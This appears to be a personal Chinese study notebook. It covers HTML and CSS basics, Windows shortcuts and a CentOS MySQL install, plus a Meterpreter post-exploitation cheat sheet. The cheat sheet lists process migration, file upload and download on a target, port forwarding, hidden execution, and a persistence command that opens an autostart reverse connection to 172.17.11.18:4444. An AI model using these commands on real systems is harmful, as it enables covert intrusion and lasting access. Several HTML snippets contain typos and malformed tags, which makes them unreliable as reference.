按鈕彈出文字
<script type="text/javascript">
function a(){
alert("有啥好看的");
}
</script>
<input type="button" value=按鈕彈出文字 onClick="javascript:a()">
複制
表格
加粗
<strong>
傾斜
<em><i>
删除線
<del><s>
下劃線
<ins><u>
盒子
<div 占一行><span 跨距>
圖像
<img src="" alt="" title=" height="" width="" border="邊框屬性">
超連結
targrt="_blank""_self" <href=""><img src=""> <a href="#two">屬性介紹
标簽屬性
<id ="two"> 屬性介紹
注釋标簽
<!-- -->
字元
空格符
< < > > & & ¥ ¥ © © ® ® ° ° -+ ± * ×
表格标簽
展示/顯示 資料 <table> 定義表格的标簽 <thead> <tr> 定義表格行 <th>……</th>html表頭部分 </tr> <thead> <tbody> <tr> 定義表格行 <td>……</td> 定義單元格/内容 加粗 <td>……</td> 定義單元格/内容 </tr> </tobdy> </table>
left center right border 邊框 1 "" 預設沒有邊框 像素值 cellpadding 預設1像素 <-> cellspacing 預設2像素 >-< width 寬度 height 高度 合并單元格 rowspan 跨行合并 數量 最上側 colspan 跨列合并 數量 最左側
清單标簽《布局》
有序
<ol> <li> </li> <li> </li> </ol>
無序
<ul> <li> </li> <li> <p> </p> </li> </ul>
自定義清單
<dl> <dt> 項目 </dt> <dd> 描述 </dd> <dd> </dd> 表單标簽《收集資訊》 表單域 <form action="demo.php" url method="post" 送出方式 name="表單域名稱"> <> 表單控件 <input type="屬性值" /> 提示資訊 <></> </form>
表單元素
<input type=" button 定義點選按鈕 checkbox 定義複選框 file 定義檔案 hidden 定義隐藏的輸入字段 image 定義圖像形式送出按鈕 password 定義密碼字段 radio 定義單選按鈕 <name> reset 定義從之按鈕 submit 定義送出按鈕 text 定義單行的輸入字段,預設20字元 ">
表單元素屬性
name 定義 input元素的名稱 value 規定 input元素的值 提示資訊 checked checked="checked" 規定此input元素首次加載被選中 maxlength 最大長度
<label> input元素定義标注(标簽)綁定表單元素 增加選擇空間大小 <input type="radio" name="sex" id="nan"/><label for="nan">男</label> <input type="radio" name="sex" id="nv"/><label for="nv">女</label> <from> 選擇: <select> <option selected="selected" value="">1</option>} <option value="">2</option> <option value=""></option> </select> </from>
表單控件《表單元素》
<form>
<textarea name=""cols="每行的字元數" rows="顯示的行數">顯示内容</textarea>
</form>
```
**********************************************************
CSS 樣式表
```
<style type="text/css" media="screen">
p {
color: red;
/*修改文字像素大小*/
font-size: 12px;
}
</style>
```
字型
```
font -weight: 字型粗細
font-size: 字型大小
background-color: 背景顔色
color: 字型顔色
font-style:字型樣式
```
文本
```
text-align:文本對齊engxius
text-indent:文本縮進
text-decoration:文本修飾,下劃線
line-height:行高
```
css内嵌表
```
<style></style> 利潤可以放任何地方
行内樣式表<p style{"color:red"}>控制目前樣式</p>
外部樣式表<link rel="stylesheet" herf="">
分割線<input type="text"><button>
```
複制
選擇器
元素 p span
類 #id
屬性 img
僞類選擇器 a:hover
字型
font -weight: 字型粗細
font-size: 字型大小
background-color: 背景顔色
color: 字型顔色
font-style:字型樣式
文本
text-align:文本對齊engxius
text-indent:文本縮進
text-decoration:文本修飾,下劃線
line-height:行高
選擇器
後代選擇器
僞類選擇器
子選擇器```
win快捷鍵
網絡擴充卡
ncpa.cpl
筆記本
notepad
遠端桌面
mstsc
檢視登入
query user
**發送資訊 **
msg user message
系統資料庫
regedit
Kali
meterpreter
meterpreter
background #挂起
sessions -l
sessions -i number
複制
程序遷移
migrate 程序号
複制
getwd
檢視工作目錄
uoload
上傳檔案到目标主機 == scp 雙斜杠轉義
download
下載下傳目标主機檔案到本地
edit
編輯檔案
search
search -d 路勁 -f *.name
portfwd
端口轉發
portfwd add -l 接收端口 -p 轉發端口 -r 偵聽位址
複制
rdesktop -u user -p pwd ip 遠端桌面
route
檢視路由表
getuid
檢視注入目标主機程序所屬使用者
sysinfo
系統資訊
ps
檢視程序資訊
migrate
移植程序
execute
運作程式
execute -H -f xxx.exe 圖形界面隐藏
複制
run persistence -X(開機自啟) -l(間隔時間) 5 -p 4444 -r 172.17.11.18
centos
yum install httpd mysql mysql-server mysql-libs mysql-server -y
sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm
yum clean all
yum makecache
複制